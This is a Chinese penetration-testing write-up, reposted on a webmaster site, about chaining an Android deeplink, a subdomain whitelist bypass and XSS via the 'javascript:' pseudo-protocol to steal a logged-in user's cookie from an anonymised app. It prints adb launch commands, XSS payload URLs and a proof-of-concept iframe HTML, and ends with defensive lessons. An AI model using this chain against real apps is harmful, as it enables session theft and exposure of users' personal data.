热点
云直播技术:创新驱动,媒体行业的新飞跃
云直播技术:实现全球观众实时共享精彩瞬间
科技带领,云直播开启数字化生活新篇章
云直播技术,增强了线上活动的沉浸感与互动性
云直播:打造全新的在线社交环境
云直播:一种创新的营销策略,旨在增强品牌在线上的知名度
云直播:为在线教育注入活力与乐趣
科技与文化在云直播的融合,展现了一个创新的展示平台
云直播:让线上活动更加吸引人,深度更胜一筹
云直播:引领在线教育新风尚
5 5 月 2025, 周一
教程

APP漏洞利用组合拳——应用克隆案例分析

由 dawei 没有评论 #克隆 #利用 #应用 #案例分析 #漏洞 #组合拳

副标题#e#

一、前言

在工作中遇到了一次Android应用克隆漏洞的案例,由于攻击过程非常有趣,综合利用了多个中低风险漏洞,产生了化腐朽为神奇的攻击效果。在此分享给大家,以扩展渗透测试思路。

漏洞

二、漏洞详情

1. 漏洞介绍

攻击者可通过散布恶意构造的HTML文件,来窃取受害者的个人信息。一旦受害者打开该文件,受害者的姓名、手机号、身份证号、交易记录等敏感信息将会被窃取。

经分析,该APP可被利用的漏洞如表2.1所示。

APP漏洞利用组合拳——应用克隆案例分析

表2.1 APP可被利用的漏洞

2. 漏洞攻击步骤描述

  • 受害者打开APP,正常登录。
  • 回到主页面,APP 切换至后台运行。
  • 受害者访问攻击者发布的恶意链接,访问恶意HTML文件。
  • 访问恶意HTML文件后,屏幕先显示APP页面,然后跳转至空白页面。
  • 之后攻击者在服务器端获取账户信息、交易记录等敏感信息。

大致流程如图2.1所示。

漏洞攻击流程

图2.1 漏洞攻击流程

三、应用克隆漏洞案例分析

1. Deeplink启动APP

Deeplink简单来说就是让APP开发者能够链接到应用内特定的页面,通过Deeplink可以直接从广告到达商品,移动应用开发者可以再现网页端的体验。而判断一个APP程序有没有使用Deeplink,最简单的方法就是通过反编译APP,在AndroidManifest.xml文件中搜索关键字“android:scheme=”。

针对目标APP的分析:

反编译APP,在AndroidManifest.xml发现一个url scheme存在android.intent.category.BROWSABLE属性,可从浏览器启动。

  1. <activity android:launchMode="singleInstance" android:name="com.xxx.router.RouterActivity" android:screenOrientation="portrait" android:theme="@style/myTransparent"> 
  2.     <intent-filter> 
  3.         <action android:name="android.intent.action.VIEW"/> 
  4.         <category android:name="android.intent.category.DEFAULT"/> 
  5.         <category android:name="android.intent.category.BROWSABLE"/> 
  6.         <data android:scheme="mydeeplink"/> 
  7.     </intent-filter> 
  8. </activity> 

在反编译后的文件夹中搜索关键字mydeeplink,发现一个Deeplink:

  1. mydeeplink://?mydeeplink={url:'/messageCenter/pages/index.html',message_type:'messagecenter'} 

经测试“mydeeplink://”可成功调用APP窗口,使用命令:

  1. adb shell am start -a "android.intent.action.VIEW" -d "mydeeplink://?mydeeplink={url:'/messageCenter/pages/index.html',message_type:'messagecenter'}"。 

2. Deeplink读取本地文件和JS代码执行

既然可以使用Deeplink,那么后续则可以通过Deeplink读取本地文件、执行JS代码,获取用户手机号、身份证号等敏感信息,或者获取Cookie。

漏洞分析过程:

经分析,发现目标APP针对攻击手段进行了一定的防护:

  • 可以使用file://协议,但是被限制了目录,无法读取数据库等文件。
  • 无法直接使用JavaScript代码:。
  • 对请求的URL做了限制,只能请求与APP主域名相关的URL。

详细分析过程如下:

使用Payload:

  1. adb shell am start -a "android.intent.action.VIEW" -d "mydeeplink://?mydeeplink={url:'https://www.baidu.com'}" 

,发现存在一定程度的安全检测,请求被拦截,如图3.1所示。

APP漏洞利用组合拳——应用克隆案例分析

图3.1  URL跳转百度失败

使用Payload:

  1. adb shell am start -a "android.intent.action.VIEW" -d "mydeeplink://?mydeeplink={url:'http://static.xxx.com/m/login.html'}" 

,发现请求成功,据此判断子域名为白名单,如图3.2所示。

URL跳转子域名成功

图3.2  URL跳转子域名成功

3. 任意URL跳转绕过Deeplink白名单

既然子域名是白名单,那么我们可以尝试子域名一些页面的跳转功能(如/index?return=https://www.baidu.com),跳转到我们自己的页面上,从而绕过Deeplink白名单限制。

漏洞分析过程:

#p#副标题#e#

在root设备上将APP目录导出到PC上,使用类似grep工具搜索关键字 *.xxx.com、url=、path=、back=、return=,发现多个存在任意URL跳转漏洞或JS代码执行漏洞的URL。

  • https://m.stock.xxx.com/static/router.html?desturl=https://www.baidu.com,任意URL跳转漏洞和XSS跨站脚本攻击,不能读文件。
  • https://test.xxx.com/ibp/outlets/index.html?returnUrl=javascript:alert(document.cookie) ,需要点击返回按钮触发跳转,任意URL跳转和XSS跨站脚本攻击,不能读文件。
  • https://static.xxx.com/pages/addRouter.html?url=https://www.baidu.com ,需要点击返回按钮触发跳转,任意URL跳转和XSS跨站脚本攻击,不能读文件。
  • https://static.xxx.com/ pages /entrance.html?discontinueUrl=javascript:alert(document.cookie) ,需要点击确定按钮,无法任意URL跳转,不能读文件,但是可以执行Javascript;。
  • https://static.xxx.com/ pages/accllation/transit.html?returnUrl=javascript:alert(document.cookie) ,无法任意URL跳转,不能读文件,但是可以执行Javascript。

Payload示例:adb shell am start -a "android.intent.action.VIEW" -d "mydeeplink://?mydeeplink={url:'https://static.xxx.com/pages/accllation/transit.html?returnUrl=https://www.baidu.com'}" ,可通过命令行启动Android虚拟机中的APP,并访问百度页面,绕过白名单限制,如图3.3所示。

子域名URL跳转百度成功

图3.3  子域名URL跳转百度成功

4. 构造恶意HTML获取Cookie

结合以上分析过程,通过构造恶意HTML文件,结合Deeplink、白名单绕过和JS代码执行漏洞,获取用户Cookie,使用Cookie获取用户敏感信息。

构造综合利用POC:

  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
  2. <html xmlns="http://www.w3.org/1999/xhtml"> 
  3. <head> 
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
  5. <title></title> 
  6. </head> 
  7. <body> 
  8. <br/><br/> 
  9. <iframe name="child" width="300" height="300" src="mydeeplink://?mydeeplink={url:' https://static.xxx.com/pages/accllation/transit.html?returnUrl=javascript:alert(document.cookie)'}" style="padding:0px;" ></iframe> 
  10. </body> 
  11. </html> 

在Android模拟器中打开APP,登录账号,然后按Home键返回主界面。

#p#副标题#e##p#分页标题#e#

在浏览器中访问构造的恶意HTML链接 http://192.168.96.1/test.html,自动唤醒APP,待页面加载完毕后,成功弹出Cookie,如图3.4所示。

获取用户cookie

图3.4   获取用户cookie

当然也可以不显示弹窗,直接把Cookie发送到自己的服务器上,以此窃取的Cookie向服务端发起请求,就可以获得该用户的数据了。

四、总结

简单梳理一下整个漏洞利用流程,如图4.1所示。

漏洞利用流程

图4.1  漏洞利用流程

从图4.1可见,Intent Scheme、WebView和子域名这三处中任意一处做了有效过滤的话,都可以阻止这次漏洞攻击。另外,在搜索的漏洞URL结果中可以发现,该APP的防护措施是比较完善的,阻止了file协议的文件读取目录,而且部分子域名页面所加载的JS也使用正则表达式做了任意URL跳转的防护,但还是忽略了对伪协议“javascript:”的防范(见图4.2)。

漏洞触发点

图4.2  漏洞触发点

随着业务的拓展,以及网络的不断扩展和日趋复杂,对内、对外服务不断增多,为企业内部制定一个安全编码规范就显得尤为重要。

总之,网络安全路途漫漫,仍然需要我们不断探索,以研究出更利于网络安全的软件。

【本文为51CTO专栏作者“安全加”原创稿件,转载请联系原作者】

戳这里,看该作者更多好文

dawei

【声明】:北京站长网内容转载自互联网,其相关言论仅代表作者个人观点绝非权威,不代表本站立场。如您发现内容存在版权问题,请提交相关链接至邮箱:bqsm@foxmail.com,我们将及时予以处理。

相关文章

教程

帝国cms6.6编辑器瘦身技巧和给每个栏目单独做个投稿表单的方法

dawei
教程

帝国cms6.6随机颜色大小展示tags

dawei
教程

帝国cms实现当前信息页高亮显示

dawei

您错过了

云直播

云直播技术:创新驱动,媒体行业的新飞跃

云直播

云直播技术:实现全球观众实时共享精彩瞬间

云直播

科技带领,云直播开启数字化生活新篇章

云直播

云直播技术,增强了线上活动的沉浸感与互动性